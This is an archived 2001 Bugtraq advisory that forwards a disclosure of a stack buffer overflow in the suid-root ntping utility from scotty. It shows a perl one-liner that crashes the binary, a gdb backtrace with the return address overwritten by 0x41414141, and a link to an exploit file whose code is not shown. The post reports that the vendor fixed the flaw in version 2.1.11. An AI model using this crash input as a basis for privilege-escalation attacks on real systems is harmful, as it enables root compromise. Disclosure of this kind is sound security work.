Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

suid scotty (ntping) overflow (fwd)

From: "Larry W. Cashdollar" <lwc () Vapid dhs org>
Date: Thu, 21 Jun 2001 10:55:48 -0400 (EDT)

This has circulated on vuln-dev not sure if it made it here yet.  Vendor 
has been notified and released a fixed version 2.1.11.  

My exploit:
http://vapid.dhs.org/ntping_exp.c

There is a much better exploit out there, but I am not sure if I have
permission to distribute it.  So I will leave that to the author.


Credit: KF <dotslash () snosoft com>


---------- Forwarded message ----------
Date: Tue, 12 Jun 2001 05:34:16 -0400
From: KF <dotslash () snosoft com>
To: vuln-dev () securityfocus com
Subject: suid scotty (ntping) overflow

I am not sure that this made it on to the list the first time I sent
it... so sorry 
if this is a duplicate

[root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)

Vendor: http://wwwhome.cs.utwente.nl/~schoenw/scotty/

What led me to research this:
arndt () aorta tat physik uni-tuebingen de (Michael Arndt) wrote:

  i run scotty-testsuite: what must i change on my system:(Linux
  slackware):
  ==== Test generated error:
  can not connect straps socket: Permission denied

straps and ntping must be installed suid root.

^------- Hrmm I sure thought that was interesting to know *grin*

Vendors affected:
unknown by the author of this document

just a note I found however...

<19990702221232.79B119410 () Galois suse de>
Hi folks,
here is the long promised posting of all suid/sgid files on a alpha of
SuSE
Linux 6.2 ... comments on wrong permissions are welcome.
Please note that SuSE has got 5 full CD-Roms so thats the reason for the
many many files ... (and too much suid/sgid ones ...)
...
-rwsr-xr-x   1 root     root        33370 Jun 30 11:11 ./usr/bin/ntping
-rwsr-xr-x   1 root     root        18352 Jun 30 11:11 ./usr/bin/straps
...

[root@linux d0tslash]# gdb /usr/bin/ntping core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
This GDB was configured as "i386-mandrake-linux"...
(no debugging symbols found)...
Core was generated by
`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.

Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libnsl.so.1...(no debugging symbols
found)...done.
Loaded symbols for /lib/libnsl.so.1
Reading symbols from /lib/libresolv.so.2...(no debugging symbols
found)...done.
Loaded symbols for /lib/libresolv.so.2
Reading symbols from /lib/libc.so.6...(no debugging symbols
found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
#0  0x40079b66 in getenv () from /lib/libc.so.6
(gdb) bt
#0  0x40079b66 in getenv () from /lib/libc.so.6
#1  0x4013aadb in inet_nsap_ntoa () from /lib/libc.so.6
#2  0x4013b9de in __res_ninit () from /lib/libc.so.6
#3  0x4013eb69 in __nss_hostname_digits_dots () from /lib/libc.so.6
#4  0x4013ff5f in gethostbyname () from /lib/libc.so.6
#5  0x080495b8 in _start ()
#6  0x41414141 in ?? ()
Cannot access memory at address 0x41414141

-KF

Attachment: ntping_exp.c
Description:

Previous By Date Next
Previous By Thread Next

Current thread: